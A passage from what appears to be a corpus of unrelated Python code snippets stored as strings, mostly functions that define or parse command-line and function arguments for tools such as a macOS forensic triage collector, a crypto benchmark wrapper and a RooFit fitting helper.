'one': 'uno', 'Goeiedag': 'Ni Hao', 'Good Morning': 'Bonjour'} )\n self.assertTrue( JobOptionsSvc.verify( 'HelloWorld', 'MyDict',\n {'Bonjour': 'Guten Tag', 'one': 'uno', 'Goeiedag': 'Ni Hao', 'Good Morning': 'Bonjour'} ) )\n self.assertEqual( HelloWorld.MyTable, [(1, 1), (2, 4), (3, 9), (4, 16)] )\n self.assertTrue( JobOptionsSvc.verify( 'HelloWorld', 'MyTable',\n \"[(1, 1), (2, 4), (3, 9), (4, 16)]\" ) )\n\n self.assertEqual( HelloWorld.MyMatrix, [[1, 2, 3], [4, 5, 6], [7, 8, 9]] )\n self.assertTrue( JobOptionsSvc.verify( 'HelloWorld', 'MyMatrix',\n \"[[1, 2, 3], [4, 5, 6], [7, 8, 9]]\" ) )", "def get_arg_select(arg_list):\n\n arg_select_string = ''\n argument_list = (itypes.rs1, itypes.rs2, itypes.rd, itypes.rm,\n itypes.imm12lo, itypes.imm12hi, itypes.imm12,\n itypes.imm20, itypes.shamt,\n itypes.shamtw)\n arg_select_list = ['0' for i in range(len(argument_list))]\n\n for i in range(len(arg_list)):\n for j in range(len(argument_list)):\n if arg_list[i] == argument_list[j]:\n if arg_select_list[j] == '1':\n pass\n else:\n arg_select_list[j] = '1'\n\n else:\n if arg_select_list[j] == '1':\n pass\n else:\n arg_select_list[j] = '0'\n arg_select_string += arg_select_list[j]\n\n return Signal(intbv(int(arg_select_string[-10:], 2))[10:])", "def parse_arguments_for_single_machine():\n\n # setup command line parser and parse arguments\n parser = argparse.ArgumentParser()\n\n arg_help = 'the path of the point sprite data (positions and intensities)' \n parser.add_argument('--input-directory',\n action='store',\n dest='input_directory',\n help=arg_help)\n \n arg_help = 'the directory where the configuration files will be generated'\n parser.add_argument('--output-directory',\n action='store',\n dest='output_directory',\n help=arg_help)\n\n arg_help = 'the point sprite header file (meta data of the sprite)'\n parser.add_argument('--psh-file',\n action='store', default='NO_FILE_PROVIDED',\n dest='psh_file',\n help=arg_help)\n \n arg_help = 'the data configuration file for the circuit and the sensor'\n parser.add_argument('--data-config-file',\n action='store', default='NO_FILE_PROVIDED',\n dest='data_config_file',\n help=arg_help)\n\n arg_help = 'simulation method, direct-sprite, linear-sprite, ... '\n parser.add_argument('--simulation-method',\n action='store', default='direct-sprite',\n dest='simulation_method',\n help=arg_help)\n\n arg_help = 'the template pbrt sensor configuration file for sprite'\n parser.add_argument('--pbrt-sprite-sensor-config',\n action='store', default='NO_FILE_PROVIDED',\n dest='pbrt_sprite_sensor_config',\n help=arg_help)\n \n arg_help = 'the template pbrt sensor configuration file for volume'\n parser.add_argument('--pbrt-volume-sensor-config',\n action='store', default='NO_FILE_PROVIDED',\n dest='pbrt_volume_sensor_config',\n help=arg_help)\n\n arg_help = 'the path of the pbrt executable that will run the simulation'\n parser.add_argument('--pbrt-executable',\n action='store', default='pbrt', # installed\n dest='pbrt_executable',\n help=arg_help)\n\n arg_help = 'the path of the sprite volumeizer executable that will ' \\\n 'convert the sprite to a volume '\n parser.add_argument('--volumizer-executable',\n action='store', default='volumizesprite', # installed \n dest='volumizer_executable',\n help=arg_help)\n \n arg_help = 'the path of the spritebounds executable that will ' \\\n 'quicky extract the bounds of the sprite to get the sensor data'\n parser.add_argument('--sprite-bounds-executable',\n action='store', default='spritebounds', # installed \n dest='spritebounds_executable',\n help=arg_help)\n\n arg_help = 'resolution of the grid converted from the sprite'\n parser.add_argument('--grid-resolution',\n action='store', default='512',\n dest='grid_resolution',\n help=arg_help)\n\n arg_help = 'running node, cluster or local, cluster by default'\n parser.add_argument('--node',\n action='store', default='cluster',\n dest='node',\n help=arg_help)\n \n arg_help = 'the base (maximum) resolution of the sensor'\n parser.add_argument('--sensor-resolution',\n action='store', default='512', \n dest='sensor_resolution',\n help=arg_help)\n\n # parse the arguments\n args = parser.parse_args()\n \n return args", "def get_arguments(self, local_machine):\n\n parser = argparse.ArgumentParser()\n\n if local_machine == \"client\":\n parser.add_argument(\"host\", help=\"target machine's host\")\n parser.add_argument(\"port\", help=\"target machine's port\", type=int)\n\n all_requests = parser.add_subparsers(help='all commands for server', dest='request', required=True)\n put_request = all_requests.add_parser('put', help='puts the specified file onto server')\n get_request = all_requests.add_parser('get', help='retrieves the specified file from server')\n all_requests.add_parser('list', help='lists the server directory')\n\n for request in put_request, get_request:\n request_help = \"file to transfer to server\" if request == put_request else \"file to retrieve from server\"\n request.add_argument('filename', help=request_help)\n\n elif local_machine == \"server\":\n parser.add_argument(\"port\", help=\"target port for listening to connections\", type=int)\n\n args = parser.parse_args()\n\n if args.port < 0 or args.port > 65535:\n raise parser.error(StatusCode.code[2002])\n self.port = args.port\n\n if local_machine == \"client\":\n self.host = args.host\n self.request = args.request\n if self.request != \"list\":\n self.file = args.filename", "def sysArgs(arguments):\n\n # if no args print usage\n if not arguments:\n print 'usage: [--auto] [--manual user_ID server_IP server_Port]'\n sys.exit()\n\n # --auto flag\n if arguments[0] == '--auto':\n return (USER_NAME, SERVER_HOST, SERVER_PORT)\n\n # --manual flag\n if arguments[0] == '--manual':\n return (arguments[1], arguments[2], int(arguments[3]))", "def _make_args(self, args, defaults=[], vararg=None, kwonlyargs=[],\n kw_defaults=[], kwarg=None):\n # On Python 2 convert vararg and kwarg to raw name, raise error using\n # lineno stored on the node and lexer from self.\n # On Python 3.3 extract name and annotation\n # After should be straight forward\n raise NotImplementedError()", "def arg_list():\n arg_list = [\n ['-d', '--domain', 'Specify the domain you are using'],\n ['-t', '--template-path', 'Specify template path'],\n ['-s', '--secrets-path', 'Specify template path'],\n ['-p', '--project', 'Specify a project name'],\n ['-c', '--cloud-platform', 'Specify the platform used'],\n ['-so', '--secrets-only', 'Generate secrets only'],\n ['-db', '--database-host', 'Specify the database host'],\n ['-dbc', '--database-connection-name', 'Specify the database connection name (GCP)'],\n ['-sbn', '--storage-bucket-name', 'Specify storage bucket name'],\n ['-sb', '--storage-backend', 'Specify storage backend s3/gcp/filesystem'],\n ['--acm', '--aws-cert-arn', 'Specify AWS ACM'],\n ['--sg-id', '--aws-alg-sg-id', 'Specify AWS SG ID'],\n ['--sentry', '--senty-dsn', 'Specify Sentry DSN'],\n ['-e', '--environment', 'Specify environment'],\n ['-g', '--gather', 'enable Gather yes or no'],\n ['--cm', '--cert-manager', 'Using cert manager?'],\n ['-m', '--modules', 'Aether modules i.e odk,ui,sync'],\n ['-r', '--redis-url', 'Redis endpoint for CouchDB sync'],\n ['-cdb', '--couchdb-url', 'Redis endpoint for CouchDB sync'],\n ['-gc', '--google-client-id', ' Google client ID for CouchDB sync']\n ]\n return arg_list", "def setup_args(**kargs):\n args = [get_nupack_exec_path(kargs['exec_name']),\n '-material', kargs['material'], '-sodium', kargs['sodium'],\n '-magnesium', kargs['magnesium'], '-dangles', kargs['dangles'], '-T', kargs['T']]\n if kargs['multi']: args += ['-multi']\n if kargs['pseudo']: args += ['-pseudo']\n return args", "def cmake_args(self):\n args = [\n self.define(\"CMAKE_C_COMPILER\", self.spec[\"mpi\"].mpicc),\n self.define(\"BUILD_SHARED_LIBS\", True),\n self.define(\"BUILD_TESTING\", self.run_tests),\n ]\n return args", "def _create_arguments(self, args):\n assert isinstance(args, (list, tuple))\n\n arguments = []\n index = 0\n for arg in args:\n assert isinstance(arg, (list, tuple))\n assert len(arg) == 2 or len(arg) == 3\n\n identifier = arg[0]\n if isinstance(arg[1], str):\n idl_type = self._create_type(\n arg[1], is_optional=(len(arg) == 3))\n else:\n idl_type = arg[1]\n\n default_value = None\n if len(arg) == 3:\n default_value = self._create_literal_constant(arg[2])\n\n arguments.append(\n Argument.IR(\n identifier,\n index=index,\n idl_type=idl_type,\n default_value=default_value))\n\n index += 1\n\n return arguments", "def get_arguments(context, arg_types, duals, header):\n\n if arg_types == ArgType.String:\n # All parameters are of string type\n script_args = [d.strData for d in duals]\n elif arg_types == ArgType.Numeric:\n # All parameters are of numeric type\n script_args = [d.numData for d in duals]\n elif arg_types == ArgType.Mixed:\n # Parameters can be either string, numeric or dual\n script_args = []\n for dual, param in zip(duals, header.params):\n if param.dataType == SSE.STRING:\n script_args.append(dual.strData)\n elif param.dataType == SSE.NUMERIC:\n script_args.append(dual.numData)\n elif param.dataType == SSE.DUAL:\n script_args.append((dual.numData, dual.strData))\n else:\n # Undefined argument types\n # Make sure the error handling, including logging, works as intended in the client\n msg = 'Undefined argument type: '.format(arg_types)\n context.set_code(grpc.StatusCode.INVALID_ARGUMENT)\n context.set_details(msg)\n # Raise error on the plugin-side\n raise grpc.RpcError(grpc.StatusCode.INVALID_ARGUMENT, msg)\n return script_args", "def test_argument_types(self):\n funcs = [\n CityHash32,\n CityHash64,\n CityHash128,\n CityHash64WithSeed,\n CityHash64WithSeeds,\n CityHash128WithSeed,\n ]\n args = [b\"ab\\x00c\", bytearray(b\"ab\\x00c\"), memoryview(b\"ab\\x00c\")]\n for func in funcs:\n values = set(func(arg) for arg in args)\n self.assertEqual(len(values), 1, values)", "def parseArguments():\n parser = argparse.ArgumentParser(description=\"AutoMacTC: an Automated macOS forensic triage collection framework.\", add_help=False)\n\n module_filter = parser.add_argument_group('module filter')\n mods = module_filter.add_mutually_exclusive_group(required=False)\n mods.add_argument('-m', '--include_modules', type=str, nargs='+', help='module(s) to use, use \"all\" to run all modules, space separated list only', default=[''], required=False)\n mods.add_argument('-x', '--exclude_modules', type=str, nargs='+', help='assumes you want to run all modules EXCEPT those specified here, space separated list only', default=[''], required=False)\n mods.add_argument('-l', '--list_modules', help='if flag is provided, will list available modules and exit.', default=False, action='store_true', required=False)\n\n general = parser.add_argument_group('general arguments')\n general.add_argument(\"-h\", \"--help\", action=\"help\", help=\"show this help message and exit\")\n general.add_argument(\"-v\", \"--verbose\", default=False, action='store_true', help=\"enable verbose logging\")\n general.add_argument('-i', '--inputdir', default='/', help='input directory; mount dmg with mountdmg.sh script and use -f to analyze mounted HFS or APFS Volume, use volume appended with \"Data\" (e.g. \"Macintosh HD - Data\") for 10.15+ systems', required=False)\n general.add_argument('-is', '--inputsysdir', default='', help='input system drive if using mounted drive from 10.15+ system (e.g. \"Macintosh HD\")', required=False)\n general.add_argument('-o', '--outputdir', default='./', help='output directory', required=False)\n general.add_argument('-p', '--prefix', help='prefix to append to tarball and/or output files', default='automactc-output', required=False)\n general.add_argument('-f', '--forensic_mode', help='if flag is provided, will analyze mounted volume provided as inputdir', default=False, action='store_true', required=False)\n general.add_argument('-nt', '--no_tarball', help='if flag is provided, will NOT package output files into tarball', default=False, action='store_true', required=False)\n general.add_argument('-nl', '--no_logfile', help='if flag is provided, will NOT generate logfile on disk', default=False, action='store_true', required=False)\n general.add_argument('-fmt', '--output_format', help='toggle between csv and json output, defaults to csv', default='csv', action='store', required=False, choices=['csv', 'json'])\n general.add_argument('-np', '--no_low_priority', help='if flag is provided, will NOT run automactc with highest niceness (lowest CPU priority). high niceness is default', default=False, action='store_true', required=False)\n general.add_argument('-b', '--multiprocessing', help='if flag is provided, WILL multiprocess modules [WARNING: Experimental!]', default=False, action='store_true', required=False)\n general.add_argument('-O', '--override_mount', help='if flag is provided, WILL bypass error where inputdir does not contain expected subdirs', default=False, action='store_true', required=False)\n\n console_log_args = parser.add_argument_group('console logging verbosity')\n console_logging_args = console_log_args.add_mutually_exclusive_group(required=False)\n console_logging_args.add_argument('-q', '--quiet', help='if flag is provided, will NOT output to console at all', default=False, action='store_true', required=False)\n console_logging_args.add_argument('-r', '--rtr', help='reduce verbosity to display nicely on RTR console', default=False, action='store_true', required=False)\n console_logging_args.add_argument('-d', '--debug', help='enable debug logging to console', default=False, action='store_true', required=False)\n\n dirlist_args = parser.add_argument_group('specific module arguments')\n dirlist_args.add_argument('-K', '--dir_include_dirs', type=str, nargs='+', help='directory inclusion filter for dirlist module, defaults to volume root, space separated list only', default=[''], required=False)\n dirlist_args.add_argument('-E', '--dir_exclude_dirs', type=str, nargs='+', help='directory and file exclusion filter for dirlist module. defaults are specified in README. space separated list only. \\\n put \\'no-defaults\\' as first item to overwrite default exclusions and then provide your own exclusions', default=[''], required=False)\n dirlist_args.add_argument('-H', '--dir_hash_alg', nargs='+', help='either sha256 or md5 or both or none, at least one is recommended, defaults to sha256. also applies to autoruns module', default='sha256', required=False)\n dirlist_args.add_argument('-S', '--dir_hash_size_limit', type=int, help='file size filter for which files to hash, in megabytes, defaults to 10MB. also applies to autoruns module', default=10, required=False)\n dirlist_args.add_argument('-R', '--dir_recurse_bundles', help='will fully recurse app bundles if flag is provided. this takes much more time and space', default=False, action='store_true', required=False)\n dirlist_args.add_argument('-NC', '--dir_no_code_signatures', help='if flag is provided, will NOT check code signatures for app and kext files. also applies to autoruns module', default=False, action='store_true', required=False)\n dirlist_args.add_argument('-NM', '--dir_no_multithreading', help='if flag is provided, will NOT multithread the dirlist module', default=False, action='store_true', required=False)\n args = parser.parse_args()\n\n return args", "def parse_args():\n global QUIET\n cores = None\n directions = ['encrypt', 'decrypt']\n alg_types = ['cipher-only', 'hash-only', 'aead-only', 'cipher-hash-all']\n\n parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter,\n description=\"Wrapper script for the ipsec-mb \" \\\n \"performance application enabling extended functionality\")\n\n # parse and validate args\n parser.add_argument(\"-a\", \"--arch\", choices=['SSE', 'AVX', 'AVX2', 'AVX512'],\n default=None, action='append',\n help=\"set architecture to test (default tests all supported archs)\")\n parser.add_argument(\"-c\", \"--cores\", default=cores,\n help=\"list/range of cores e.g. 2-8 or 3,4,5\")\n parser.add_argument(\"-d\", \"--direction\", default=None,\n choices=directions, help=\"Cipher direction\")\n parser.add_argument(\"-o\", \"--offset\", default=None, type=int,\n help=\"offset for the SHA size increment\")\n parser.add_argument(\"-t\", \"--alg-type\", default=None, action='append', choices=alg_types,\n help=\"algorithm types to test\")\n parser.add_argument(\"-s\", \"--job-size\", default=None,\n help=textwrap.dedent('''\\\n size of the cipher & hash job in bytes.\n It can be:\n - single value: test single size\n - list: test multiple sizes separated by commas\n - range: test multiple sizes with following format\n min:step:max (e.g. 16:16:256)\\n'''))\n parser.add_argument(\"-q\", \"--quiet\", default=False, action='store_true',\n help=\"disable verbose output\")\n parser.add_argument(\"--cold-cache\", default=False, action='store_true',\n help=\"use cold cache, it uses warm as default\")\n parser.add_argument(\"--arch-best\", action='store_true',\n help=\"detect available architectures and run only on the best one\")\n parser.add_argument(\"--shani-off\", action='store_true', help=\"don't use SHA extensions\")\n parser.add_argument(\"--force-job-api\", action='store_true',\n help=\"use JOB API for algorithms supported through direct API (i.e. AES-GCM, chacha20-poly1305)\")\n parser.add_argument(\"--unhalted-cycles\", action='store_true',\n help=textwrap.dedent('''\\\n measure using unhalted cycles (requires root).\n Note: RDTSC is used by default'''))\n parser.add_argument(\"--quick\", action='store_true',\n help=textwrap.dedent('''\\\n reduces number of test iterations by x10\n (less precise but quicker)'''))\n parser.add_argument(\"--smoke\", action='store_true',\n help=textwrap.dedent('''\\\n very quick, imprecise and without print out\n (for validation only)'''))\n parser.add_argument(\"--imix\", default=None,\n help=textwrap.dedent('''\\\n set numbers that establish occurrence proportions between packet sizes.\n It requires a list of sizes through --job-size.\n (e.g. --imix 4,6 --job-size 64,128 will generate\n a series of job sizes where on average 4 out of 10\n packets will be 64B long and 6 out of 10 packets\n will be 128B long)'''))\n parser.add_argument(\"--aad-size\", default=None, type=int,\n help=\"size of AAD for AEAD algorithms\")\n parser.add_argument(\"--job-iter\", default=None, type=int,\n help=\"number of tests iterations for each job size\")\n parser.add_argument(\"--no-time-box\", default=False, action='store_true',\n help=\"disables time box feature for single packet size test duration (100ms)\")\n parser.add_argument(\"--buffer-offset\", default=None, type=int,\n help=\"buffer start address offset value 0-15, default 0\")\n\n args = parser.parse_args()\n\n # validate and convert values where necessary\n if args.arch is not None and args.arch_best is True:\n print(\"{}: error: argument -a/--arch cannot be used with \" \\\n \"--arch-best\".format(sys.argv[0]), file=sys.stderr)\n sys.exit(1)\n\n if args.cores is not None:\n try:\n cores = parse_cores(args.cores)\n except:\n print(\"{}: error: argument -c/--cores: invalid value \" \\\n \"{}\".format(sys.argv[0], args.cores), file=sys.stderr)\n sys.exit(1)\n\n if args.imix is not None and args.job_size is None:\n print(\"{}: error: argument --imix must be used with \" \\\n \"--job-size\".format(sys.argv[0]), file=sys.stderr)\n sys.exit(1)\n\n if args.alg_type is not None:\n alg_types = args.alg_type\n else:\n # strip all cipher hash combinations in default run\n alg_types = alg_types[:-1]\n\n if args.direction is not None:\n directions = [args.direction]\n\n if args.quiet is True:\n QUIET = True\n\n return args.arch, cores, directions, args.offset, \\\n alg_types, args.job_size, args.cold_cache, args.arch_best, \\\n args.shani_off, args.force_job_api, args.unhalted_cycles, \\\n args.quick, args.smoke, args.imix, \\\n args.aad_size, args.job_iter, args.no_time_box, args.buffer_offset", "def process_cl_args():\n\n parser = argparse.ArgumentParser(add_help=False)\n parser.add_argument('commands', nargs='*')\n parser.add_argument('--help', '-h', action='store_true')\n parser.add_argument('--version', '-v', action='store_true')\n parser.add_argument('--debug', '-d', action='store_true')\n parser.add_argument('--logging', '-l', action='store_true')\n parser.add_argument('--no-autosize', action='store_true')\n parser.add_argument('--no-preload', action='store_true')\n args = parser.parse_args()\n\n if args.version:\n xprint(get_version_info())\n xprint(\"\")\n sys.exit()\n\n elif args.help:\n for x in helptext():\n xprint(x[2])\n sys.exit()\n\n if args.debug or os.environ.get(\"mpsytdebug\") == \"1\":\n xprint(get_version_info())\n g.debug_mode = True\n g.no_clear_screen = True\n logfile = os.path.join(tempfile.gettempdir(), \"mpsyt.log\")\n logging.basicConfig(level=logging.DEBUG, filename=logfile)\n logging.getLogger(\"pafy\").setLevel(logging.DEBUG)\n\n elif args.logging or os.environ.get(\"mpsytlog\") == \"1\":\n logfile = os.path.join(tempfile.gettempdir(), \"mpsyt.log\")\n logging.basicConfig(level=logging.DEBUG, filename=logfile)\n logging.getLogger(\"pafy\").setLevel(logging.DEBUG)\n\n if args.no_autosize:\n g.detectable_size = False\n\n g.command_line = \"playurl\" in args.commands or \"dlurl\" in args.commands\n if g.command_line:\n g.no_clear_screen = True\n\n if args.no_preload:\n g.preload_disabled = True\n\n g.argument_commands = args.commands", "def extract_argument_types(*args: Sequence[Any]) -> str:\n collapsed_args = []\n\n for arg in args:\n if is_list_like(arg):\n collapsed_nested = []\n for nested in arg:\n if is_list_like(nested):\n collapsed_nested.append(f\"({extract_argument_types(nested)})\")\n else:\n collapsed_nested.append(_get_argument_readable_type(nested))\n collapsed_args.append(\",\".join(collapsed_nested))\n else:\n collapsed_args.append(_get_argument_readable_type(arg))\n\n return \",\".join(collapsed_args)", "def test_cmdlineproc_test1():\n\n parameters = {\n \"debug\": False,\n \"disconnect\": False,\n \"executable\": \"\",\n \"executableargs\": \"\",\n \"hosts\": \"\",\n \"job\": \"\",\n \"jobname\": \"\",\n \"log\": \"\",\n \"recover\": \"\",\n \"resource\": \"\",\n \"replicates\": \"\",\n \"verbose\": False\n }\n\n commandlineargs = []\n\n longbowargs = _commandlineproc(ALLLONGBOWARGS, commandlineargs, parameters)\n\n assert parameters[\"executable\"] == \"\"\n assert parameters[\"executableargs\"] == \"\"\n assert longbowargs == []", "def get_change_tool_args(self,comArgs):\n params, flags = self.get_params(comArgs)\n args = [params.get('T')] \n return args", "def Args(parser):", "def _build_arguments(self):\n # TODO: comeback to allow test path override. maybe?\n # self._parser.add_argument(\n # '--test-path',\n # type=utils.validate_path,\n # required=False,\n # help=('Path th projects test Dockerfile. Dockerfile should be in the root of the test directory.')\n # )\n self._parser.add_argument(\n '--configs',\n type=bool,\n required=False,\n default=False,\n help=\"Would you like to inject configuration files?\"\n )", "def get_init_arguments_and_types(cls) -> List[Tuple[str, Tuple, Any]]:\n return get_init_arguments_and_types(cls)", "def fetch_arguments(op_def, arg, ws):\n return [fetch_argument(op_def, desc, ws) for desc in arg.strings]", "def __init__(self, name, rettype, args):\n self.name, self.rettype, self.args = name, rettype, args", "def _pull_argops(op_dict):\n import inspect\n out = []\n keys = op_dict.keys()\n keys.sort() # Not necessary, but makes scanning the printout easier\n for k in keys:\n # Create a dictionary that will be used to fill the 'code' template\n d = {}\n d[\"enum_name\"] = enum_name = op_dict[k][3:] # <NAME>\n d[\"funct_name\"] = \"%s\" % enum_name.lower() # <name>\n class_name = \"%s4args\" % enum_name\n klass = getattr(_type, class_name, None)\n if klass is None:\n # This operation takes no arguments\n d[\"funct_args\"] = d[\"create_args\"] = d[\"set_args\"] = \"\"\n else:\n if type(klass) is dict:\n arg_list = \"enum_value\"\n d[\"create_args\"] = \"args = enum_value\"\n else:\n arg_list = \", \".join(inspect.getargspec(klass.__init__)[0][1:])\n d[\"create_args\"] = \"args = _type.%s(%s)\" % (class_name, arg_list)\n d[\"funct_args\"] = arg_list\n if enum_name.startswith(\"CB_\"):\n d[\"set_args\"] = \"opcb%s=args\" % enum_name.lower()[3:]\n else:\n d[\"set_args\"] = \"op%s=args\" % enum_name.lower()\n if enum_name.startswith(\"CB_\"):\n d[\"argop\"] = \"nfs_cb_argop4\"\n else:\n d[\"argop\"] = \"nfs_argop4\"\n out.append(d)\n return out", "def test_type_kwarg(self, parse_input):\n bb = parse_input(\"name testname\\nversion 1.0\\ntarget example (6)\\ntype example (copies=1000)\")\n assert bb.programtype[\"options\"] == {\"copies\": 1000}", "def robotics_arg_parser():\n parser = arg_parser()\n parser.add_argument('--env', help='environment ID', type=str, default='FetchReach-v0')\n parser.add_argument('--seed', help='RNG seed', type=int, default=0)\n parser.add_argument('--num-timesteps', type=int, default=int(1e6))\n return parser", "def __add_common_args(parser: argparse.ArgumentParser):\n parser.add_argument(\"--model\", help=\"name of the model to use. Use query --get-models to get a list of valid names.\")\n parser.add_argument(\"--grid-type\", help=\"type of the grid to use.\")\n parser.add_argument(\"--level-type\", help=\"type of the vertical level to use.\")\n parser.add_argument(\"--init-time\", help=f\"initialization time to use. \"\n \"Integers are interpreted as hours since model start, dates formatted as \"\n f\"{__DATE_FORMAT.replace('%Y', 'YYYY').replace('%m', 'MM').replace('%d', 'DD').replace('%H', 'HH').replace('%M', 'MM')} are interpreted as absolute start dates.\")\n parser.add_argument(\"--variable\", nargs=\"+\", help=\"name of the variable to use. Use query --get-vars to get a list of valid names.\")\n parser.add_argument(\"--levels\", nargs=\"+\", type=int, help=\"levels to use.\")\n parser.add_argument(\"--lead-time\", nargs=\"+\", type=int, help=\"lead times to use in hours.\")", "def args(self):\n return (\n self.species_names,\n self.rxn_names,\n self.react_stoic,\n self.prod_stoic,\n self.init_state,\n self.k_det,\n self.chem_flag,\n self.volume,\n )", "def unit_test_obj_mk_tellu(p, rname, inputs):\n # define name and arguments\n name = 'obj_mk_tellu'\n arg_names = ['night_name', 'files']\n arg_types = [str, list]\n\n # get arguments\n args = get_args(p, name, rname, inputs, arg_names, arg_types)\n return args, name", "def test_args(self):\n parser = argparse.ArgumentParser(\n prog=\"sysbottle\", description=\"sysbottle is parsed\"\n )\n subparsers = parser.add_subparsers()\n sysbottle.build(subparsers)\n args = parser.parse_args(\n [\n \"sysbottle\",\n \"abc.txt\",\n \"-c\",\n \"90\",\n \"-q\",\n \"1\",\n \"-d\",\n \"sda\",\n \"-i\",\n \"5\",\n \"-t\",\n \"3\",\n ]\n )\n self.assertTrue(hasattr(args, \"file\"))\n self.assertTrue(hasattr(args, \"cpu\"))\n self.assertTrue(hasattr(args, \"diskQ\"))\n self.assertTrue(hasattr(args, \"disks\"))\n self.assertTrue(hasattr(args, \"iowait\"))\n self.assertTrue(hasattr(args, \"throughput\"))", "def parseargs(p):\n p.set_defaults(func=func)\n p.description = \"Print machine architecture.\"\n return p", "def get_type(args_str, entry_type):\r\n # The C-method-implementations accept self as the first argument,\r\n # so a one-argument method will be invoked with zero arguments in Python.\r\n no_args = 1 if entry_type == \"method\" else 0\r\n return (\"METH_NOARGS\" if len(args_str.split(\",\")) == no_args\r\n else \"METH_VARARGS\")", "def parse_args ( self , dataset = None , *args , **kwargs ) :\n _args = []\n for a in args :\n if not isinstance ( a , ROOT.RooCmdArg ) :\n self.error ( 'parse_args: unknown argument type %s/%s, skip' % ( a , type ( a ) ) )\n else : _args.append ( a ) \n\n from ostap.plotting.fit_draw import keys as drawing_options\n\n silent = None\n verbose = None\n \n for k , a in items_loop ( kwargs ) :\n \n klow = k.lower ().replace('_','')\n kup = k.upper ().replace('_','')\n \n ## skip \"drawing\" options \n if klow in drawing_options : continue \n if klow in ( 'draw' ,\n 'drawoption' ,\n 'drawoptions' ) : continue \n \n if isinstance ( a , ROOT.RooCmdArg ) : _args.append ( a )\n \n elif kup in ( 'VERBOSE' , ) and isinstance ( a , bool ) :\n \n if not verbose is None :\n if a != verbose : \n logger.warning ( 'parse_args: Redefine VERBOSE to %s' % a ) \n verbose = a \n if not silent is None :\n if a == silent :\n logger.warning ( 'parse_args: confusing VERBOSE/SILENT %s/%s' % ( a , silent ) )\n silent = not a \n _args.append ( ROOT.RooFit.Verbose ( a ) )\n elif kup in ( 'SILENT' ,\n 'SILENCE' ) and isinstance ( a , bool ) :\n if not silent is None :\n if a != silent : \n logger.warning ( 'parse_args: Redefine SILENT to %s' % a ) \n verbose = a \n if not verbose is None :\n if a == verbose :\n logger.warning ( 'parse_args: confusing SILENT/VERBOSE %s/%s' % ( a , verbose ) )\n verbose = not a\n _args.append ( ROOT.RooFit.Verbose ( not a ) ) \n elif kup in ( 'STRATEGY' , \n 'MINUITSTRATEGY' ,\n 'STRATEGYMINUIT' ) and isinstance ( a , integer_types ) and 0 <= a <= 2 : \n _args.append ( ROOT.RooFit.Strategy ( a ) ) \n elif kup in ( 'PRINTLEVEL' ,\n 'MINUITPRINT' ,\n 'MINUITLEVEL' ) and isinstance ( a , integer_types ) and -1 <= a <= 3 :\n _args.append ( ROOT.RooFit.PrintLevel ( a ) ) \n elif kup in ( 'PRINTEVALERRORS' ,\n 'PRINTERRORS' ,\n 'ERRORSPRINT' ) and isinstance ( a , integer_types ) and -1 <= a :\n _args.append ( ROOT.RooFit.PrintEvalErrors ( a ) ) \n elif kup in ( 'TIMER' ,\n 'TIMING' ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.Timer ( a ) ) \n elif kup in ( 'WARNING' ,\n 'WARNINGS' ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.Warnings ( a ) ) \n \n elif kup in ( 'SUMW2' ,\n 'SUMW2ERR' ,\n 'SUMW2ERROR' ,\n 'SUMW2ERRORS' ) and isinstance ( a , bool ) :\n \n if a and dataset and dataset.isWeighted() : pass \n elif a and dataset and not dataset.isWeighted() :\n self.warning ('parse_args: SumW2-flag is True for non-weighted dataset')\n elif dataset and not dataset.isWeighted() and not a : pass \n elif dataset and dataset.isWeighted() and not a :\n self.warning ('parse_args: SumW2-flag is False for weighted dataset') \n\n _args.append ( ROOT.RooFit.SumW2Error( a ) )\n \n elif kup in ( 'ASYMPTOTIC' ,\n 'ASYMPTOTICERR' ,\n 'ASYMPTOTICERROR' ,\n 'ASYMPTOTICERRORS' ) and isinstance ( a , bool ) and 61900 <= root_version_int :\n \n if a and dataset and dataset.isWeighted() : pass \n elif a and dataset and not dataset.isWeighted() :\n self.warning ('parse_args: AsymptoticError-flag is True for non-weighted dataset')\n elif dataset and not dataset.isWeighted() and not a : pass \n elif dataset and dataset.isWeighted() and not a :\n self.warning ('parse_args: AsymptoticError-flag is False for weighted dataset') \n\n if a and root_version_int < 62006 :\n self.warning (\"``Asymptotic=True'' will crash if Title!=Name (ROOT-10668)\")\n \n _args.append ( ROOT.RooFit.AsymptoticError ( a ) )\n \n elif kup in ( 'BATCH' ,\n 'BATCHMODE' ) and isinstance ( a , bool ) and 62000 <= root_version_int :\n _args.append ( ROOT.RooFit.BatchMode ( a ) ) \n elif kup in ( 'EXTENDED' , ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.Extended ( a ) ) \n elif kup in ( 'CPU' ,\n 'CPUS' ,\n 'NCPU' ,\n 'NCPUS' ,\n 'NUMCPU' ,\n 'NUMCPUS' ) and isinstance ( a , int ) and 1<= a : \n _args.append ( ROOT.RooFit.NumCPU( a ) ) \n elif kup in ( 'CPU' ,\n 'CPUS' ,\n 'NCPU' ,\n 'NCPUS' ,\n 'NUMCPU' ,\n 'NUMCPUS' ) and \\\n isinstance ( a , list_types ) and 2 == len ( a ) and \\\n isinstance ( a[0] , integer_types ) and 1 <= a[1] and \\\n isinstance ( a[1] , integer_types ) and 0 <= a[1] <=3 :\n _args.append ( ROOT.RooFit.NumCPU( a[0] , a[1] ) ) \n \n elif kup in ( 'RANGE' ,\n 'FITRANGE' ,\n 'RANGES' ,\n 'FITRANGES' ) and isinstance ( a , string_types ) :\n _args.append ( ROOT.RooFit.Range ( a ) ) \n elif kup in ( 'RANGE' ,\n 'FITRANGE' ) and isinstance ( a , list_types ) \\\n and isinstance ( a[0] , num_types ) \\\n and isinstance ( a[1] , num_types ) \\\n and a[0] < a[1] : \n _args.append ( ROOT.RooFit.Range ( a[0] , a[1] ) )\n elif kup in ( 'MINIMIZER' , ) and isinstance ( a , list_types ) \\\n and isinstance ( a[0] , string_types ) \\\n and isinstance ( a[1] , string_types ) :\n _args.append ( ROOT.RooFit.Minimizer ( a[0] , a[1] ) ) \n elif kup in ( 'HESSE' , ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.Hesse ( a ) )\n elif kup in ( 'INITIALHESSE' ,\n 'INITHESSE' ,\n 'HESSEINIT' ,\n 'HESSEINITIAL' ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.InitialHesse ( a ) )\n elif kup in ( 'OPTIMIZE' ,\n 'OPTIMISE' ) and isinstance ( a , integer_types ) :\n _args.append ( 